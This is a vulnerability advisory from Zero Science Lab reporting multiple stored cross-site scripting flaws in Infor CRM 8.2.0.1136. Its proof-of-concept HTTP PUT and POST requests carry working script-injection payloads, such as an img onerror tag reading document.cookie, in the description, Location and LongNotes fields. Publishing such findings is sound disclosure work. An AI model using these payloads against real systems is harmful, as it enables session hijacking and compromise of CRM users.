Infor CRM 8.2.0.1136 Cross Site Scripting

`  
Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities  
  
  
Vendor: Infor  
Product web page: http://www.infor.com  
Affected version: 8.2.0.1136  
  
  
Summary: Infor® CRM, formerly Saleslogix, is an award-winning  
customer relationship management (CRM) solution that provides  
a complete view of customer interactions, so your business can  
collaborate and respond promptly and knowledgably to customer  
inquiries, sales opportunities, and service requests. Infor CRM  
includes a robust suite of sales, marketing, and service capabilities,  
to offer businesses of all sizes a fast, flexible, and affordable  
solution for finding, winning, and growing profitable customer  
relationships.  
  
Desc: Infor CRM suffers from multiple stored cross-site scripting  
vulnerabilities. Input passed to several POST/PUT parameters in  
JSON format is not properly sanitised before being returned to the  
user. This can be exploited to execute arbitrary HTML and script  
code in a user's browser session in context of an affected site.  
  
Tested on: Microsoft-IIS/8.5  
ASP.NET/4.0.30319  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5308  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php  
  
  
21.01.2016  
  
---  
  
  
----------------------------------  
Affected parameter(s): description  
----------------------------------  
  
PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1  
Host: intranet.zeroscience.mk  
  
{$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…}  
"": ""  
$descriptor: ""  
$etag: "+CgjMLB+0nA="  
$httpStatus: 200  
$key: "eUSERA0004IX"  
$lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"  
$post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"  
$schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json"  
$service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json"  
$template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json"  
$updated: "/Date(1456359095000)/"  
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')"  
accountId: null  
activityId: null  
attachDate: "2016-01-25T00:09:39Z"  
contactId: null  
contractId: null  
createDate: "/Date(1456359095000)/"  
createUser: "UUSERA0005W0"  
dataType: "R"  
defectId: null  
description: "<img src=j onerror=confirm(document.cookie) >"  
details: {createSource: null}  
documentType: null  
fileExists: true  
fileName: "inforcrm_xss.png"  
fileSize: 101722  
historyId: null  
leadId: null  
modifyDate: "/Date(1456359095000)/"  
modifyUser: "UUSERA0005W0"  
opportunityId: null  
physicalFileName: "!eUSERA0004IXinforcrm_xss.png"  
productId: null  
remoteStatus: null  
returnId: null  
salesOrderId: null  
ticketId: null  
url: null  
user: {$key: "UUSERA0005W0"}  
  
  
  
-----------------------------------------------------------  
Affected parameter(s): Description, Location, and LongNotes  
-----------------------------------------------------------  
  
POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1  
Host: intranet.zeroscience.mk  
  
{$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…}  
$descriptor: ""  
$httpStatus: 200  
AccountId: null  
AccountName: null  
ActivityAttendees: {}  
ActivityBasedOn: null  
Alarm: false  
AlarmTime: "2016-01-24T22:45:00Z"  
AllowAdd: true  
AllowComplete: true  
AllowDelete: true  
AllowEdit: true  
AllowSync: true  
AppId: null  
Attachment: false  
AttachmentCount: null  
AttendeeCount: 0  
Category: "Pleasantville"  
ContactId: null  
ContactName: null  
CreateDate: "/Date(-62135596800000)/"  
CreateUser: null  
Description: "<img src=zsl onerror=prompt(1) >"  
Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…}  
ChangeKey: null  
CreateSource: null  
ForeignId1: null  
ForeignId2: null  
ForeignId3: null  
ForeignId4: null  
GlobalSyncId: null  
ProjectId: null  
Tick: null  
UserDef1: null  
UserDef2: null  
UserDef3: null  
Duration: "0"  
EndDate: "/Date(1456359315286)/"  
LeadId: null  
LeadName: null  
Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"}  
$descriptor: "Userovich, User"  
$key: "UUSERA0005W0"  
Location: "<img src=zsl onerror=prompt(2) >"  
LongNotes: "<img src=zsl onerror=prompt(3) >"  
ModifyDate: "/Date(-62135596800000)/"  
ModifyUser: null  
Notes: "Zero Science Lab"  
OpportunityId: null  
OpportunityName: null  
OriginalDate: "/Date(1456358415286)/"  
PhoneNumber: null  
Priority: "1"  
ProcessId: null  
ProcessNode: null  
RecurIterations: 0  
RecurPeriod: 0  
RecurPeriodSpec: 0  
RecurSkip: null  
RecurrenceState: "rsNotRecurring"  
Recurring: false  
Resources: {}  
Rollover: false  
StartDate: "2016-01-25T00:00:05Z"  
TicketId: null  
TicketNumber: null  
Timeless: true  
Type: "atToDo"  
UserActivities: {}  
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"  
UserNotifications: {}  
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27"  
`